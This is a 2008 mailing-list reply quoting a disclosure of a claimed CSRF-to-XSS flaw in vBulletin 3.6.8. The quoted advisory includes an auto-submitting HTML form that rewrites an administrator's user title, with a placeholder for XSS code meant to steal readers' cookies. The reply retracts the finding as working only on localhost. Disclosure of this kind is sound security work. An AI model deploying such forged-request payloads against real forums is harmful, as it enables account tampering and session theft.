Re: vBulletin 3.6.8 XSRF/XSS Vulnerability
Am Samstag 05 Januar 2008 22:46:14 schrieb nbbn@xxxxxxx:
> ###############################################################
> Autor: NBBN
> Founded: 5, January 2008
> vBulletin Version: 3.6.8 Patch Level x and possible lower
> Type: XSRF/XSS
> Risk: Medium
> ###############################################################
>
> ##Explanation(english)##
>
> My english is bad, but I try :-) . vBulletin 3.6.8 is XSRF vulnurable.
> Administrators can use html in there own usertitle.
> An attacker can update the profile of an administrator by sending a link
> to a site with a code like this:
>
>
> <html>
> <head></head>
> <body onLoad=javascript:document.form.submit()>
>
> <form
> action="http://domain.tld/[path]/vBulletin/profile.php?do=updateprofile"
> method="POST" name="form">
>
> <input type="hidden" name="s" value="">
> <input type="hidden" name="do" value="updateprofile">
> <input type="hidden" name="customtext" value="###########XSS
> CODE#########"> <!-- Attacker's XSS Code -->
> <input type="hidden" name="month" value="-1">
> <input type="hidden" name="day" value="-1">
> <input type="hidden" name="year" value="">
> <input type="hidden" name="oldbirthday" value="">
> <input type="hidden" name="showbirthday" value="2">
> <input type="hidden" name="homepage" value="">
> <input type="hidden" name="icq" value="">
> <input type="hidden" name="aim" value="">
> <input type="hidden" name="msn" value="">
> <input type="hidden" name="yahoo" value="">
> <input type="hidden" name="skype" value="">
> </form>
> </body>
> </html>
>
> If an attacker send a link in a pm for example, to the admin with a site
> like the example code, the admin's usertitle updating and have a the code
> of the attacker.The code executing if the admin have a post done in a
> thread etc. An attacker can use this to steal the cookie of all user's who
> are reading the thread.
>
>
> ##Explanation(Deutsch/German)##:
>
> In vBulletin 3.6.8 gibt es eine XSRF Lücke, die dazu benutzt werden kann,
> um XSS Code auszuführen. Admins können in ihren eigenen Benutzerrang HTML
> Code verwenden. Das kann ein Angreifer ausnutzen um beliebigen
> html/javascript code auszuführen, wenn er den oben stehenden code in eine
> Seite packt und dann dem Admin eine Private Nachricht sendet, mit einem
> Link zu einer Seite mit dem obigen HTML-Code. Somit ist es dem Angreifer
> möglich, alle Cookies von den Benutzern zu klauen, die gerade einen Thread
> lesen,in welchem ein Administrator gepostet hat.
Sorry this not work, tested only at localhost, but from remote host's it
doesn't work.